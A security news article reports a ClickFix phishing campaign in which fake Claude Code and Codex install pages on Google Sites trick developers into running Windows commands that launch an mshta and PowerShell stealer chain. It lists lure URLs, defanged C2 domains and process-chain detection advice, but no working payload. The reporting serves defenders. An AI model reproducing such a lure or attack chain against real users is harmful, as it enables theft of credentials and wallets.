Fake Claude Code and Codex Install Pages on Google Sites Push Credential-Stealing Malware

A new ClickFix-style phishing campaign is impersonating Claude Code and OpenAI Codex to trick developers into running malicious setup instructions. The attack uses Google Sites pages that look like legitimate installation guides, then pushes victims into launching a Windows command that starts a credential-stealing malware chain.

ANY.RUN flagged one Claude-themed lure as malicious in its sandbox analysis, with the page hosted at sites.google.com/view/clau-ver-un-24 and tagged as ClickFix phishing. The campaign targets users who already expect AI coding tools to involve terminal-based setup steps.

The risk is serious because the malware does not rely on a normal downloaded installer. Instead, the victim follows what appears to be a setup instruction, and the attack chain moves into script-based execution that can steal browser data, email credentials, cryptocurrency wallet data, and other sensitive information.

How The Fake Claude Code Installer Attack Works

The campaign uses trusted-looking Google Sites pages to mimic installation pages for developer tools. This makes the lure more convincing because the visible hosting domain belongs to Google, even though the content on the page does not come from Anthropic or OpenAI.

From there, victims are instructed to run a command through Windows utilities. The public ANY.RUN campaign post says the chain uses a user-executed mshta step, multi-stage PowerShell delivery, steganographic payload extraction from an image, in-memory shellcode execution, and exfiltration to attacker-controlled infrastructure.

This approach works because developers often copy terminal commands from documentation. Attackers abuse that habit by making the page look like a routine installation guide instead of a malware delivery page.

Key Details At A Glance

Campaign type	ClickFix social engineering attack
Main lure	Fake Claude Code and OpenAI Codex installation pages
Hosting abuse	Google Sites pages used to increase trust
Initial execution method	User is told to run a Windows command
Notable tools abused	mshta.exe and powershell.exe
Payload behavior	In-memory stealer execution using staged scripts
Data at risk	Browser credentials, email data, and cryptocurrency wallet information

Why AI Coding Tools Make The Lure More Believable

Claude Code and Codex are both real developer tools, and both can be used from a terminal. That gives attackers a believable cover story when they ask users to paste commands into Windows or another command-line interface.

Anthropic’s Claude Code quickstart explains that Claude Code works through a terminal and supports several installation methods. OpenAI’s Codex CLI documentation similarly describes Codex as a local terminal-based coding agent that can read, edit, and run code in a selected directory.

That normal developer workflow creates a security gap. A user may trust a command because it resembles real documentation, even when the page itself comes from an unrelated domain or a sponsored search result.

ClickFix Attacks Turn User Trust Into Execution

ClickFix attacks rely on social engineering rather than a traditional software exploit. The attacker convinces the victim to copy and run a command that appears to fix a problem, verify access, or complete an installation.

Trend Micro described a related InstallFix campaign involving fake Claude AI installer pages, Google Ads promotion, malicious PowerShell instructions, mshta.exe abuse, obfuscated scripts, and fileless payload delivery.

The method is effective because the victim performs the most important step for the attacker. Security prompts, browser warnings, and file download checks may not appear if the attack uses built-in Windows tools and in-memory execution.

Steganography And In-Memory Execution Reduce Visibility

ANY.RUN’s public analysis says the campaign hides part of the payload inside an image and extracts it only during execution. This technique, known as steganography, can reduce obvious file artifacts and make detection harder for teams that rely mainly on static file scanning.

The ANY.RUN report also shows the Google Sites lure receiving a malicious verdict and ClickFix-related detection. That confirms the campaign uses social engineering first, then script-based execution paths after user action.

🚨 𝗙𝗮𝗸𝗲 𝗖𝗹𝗮𝘂𝗱𝗲 & 𝗖𝗼𝗱𝗲𝘅 𝗗𝗲𝗹𝗶𝘃𝗲𝗿 𝗜𝗻-𝗠𝗲𝗺𝗼𝗿𝘆 𝗦𝘁𝗲𝗮𝗹𝗲𝗿: 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝘃𝗶𝗮 𝗚𝗼𝗼𝗴𝗹𝗲 𝗦𝗶𝘁𝗲𝘀
⚠️ We’re tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure… pic.twitter.com/BeiU03Stua

— ANY.RUN (@anyrun_app) June 3, 2026

Because the activity can run through powershell.exe, some network and endpoint tools may treat parts of the traffic as normal administrative behavior. Defenders need behavioral rules that detect suspicious process chains, not just known malware files.

Why Developers Face Higher Risk

Developers, security researchers, and AI power users frequently install command-line tools. They also work with API keys, Git credentials, package registry tokens, cloud access tokens, SSH keys, and cryptocurrency wallets.

That makes developer machines high-value targets. A single infected workstation can expose personal accounts, work credentials, source code access, cloud environments, and private project data.

The fake pages also benefit from timing. Claude Code, Codex, and similar AI coding agents have become common enough that many users search for installation instructions, compare guides, and follow steps quickly without checking every source.

Indicators And Infrastructure Reported Publicly

Type	Indicator	Description
URL	sites.google.com/view/clau-ver-un-24	Claude-themed Google Sites lure
URL	sites.google.com/view/cdx-biz-ver-24	Codex-themed Google Sites lure reported by ANY.RUN
Domain	fairpoint29[.]com	Claude embedded lure domain reported by ANY.RUN
Domain	fluxforge97[.]com	Claude embedded lure domain reported by ANY.RUN
Domain	freshbase11[.]com	Codex embedded lure domain reported by ANY.RUN
Domain	wiseview58[.]com	Codex embedded lure domain reported by ANY.RUN
C2	enhanceblabber[.]cc	Command-and-control domain reported by ANY.RUN
Process	mshta.exe	Windows utility abused in the initial execution chain
Process	powershell.exe	Used for staged delivery and in-memory activity

Security teams should treat these indicators as a starting point, not a complete detection strategy. Attackers can rotate domains quickly, especially when they rely on social engineering and trusted hosting platforms.

How To Install Claude Code And Codex Safely

Users should only follow installation steps from official documentation or verified repositories. For Claude Code, users should start with the official Anthropic quickstart guide. For Codex, users should use the official OpenAI Codex CLI page or the linked OpenAI GitHub repository.

Search ads, copied snippets, forum posts, and unofficial setup pages should not be trusted by default. This matters even more when a page asks the user to paste a command into PowerShell, Terminal, or Command Prompt.

• Open official documentation manually instead of clicking sponsored results.
• Check the real browser address bar before running any install step.
• Do not run commands from Google Sites, paste pages, forums, or random blogs.
• Use a test VM or sandbox before evaluating unfamiliar developer tools.
• Keep endpoint protection enabled during installations.
• Rotate exposed API keys and tokens after any suspicious command execution.
• Review shell history for unknown install commands.

What Organizations Should Monitor

Companies should look for suspicious parent-child process relationships involving browsers, mshta.exe, powershell.exe, script hosts, and network connections to newly registered or low-reputation domains.

The ANY.RUN IoC post lists multiple lure and infrastructure domains, while Trend Micro’s Claude Code InstallFix research shows how similar campaigns use fileless delivery, evasion, and attacker-controlled command-and-control servers.

Defenders should also create policies around command-line installs for developer tools. Blocking every script may disrupt engineering teams, but unmanaged copy-paste installation from unknown pages creates unnecessary risk.

FAQ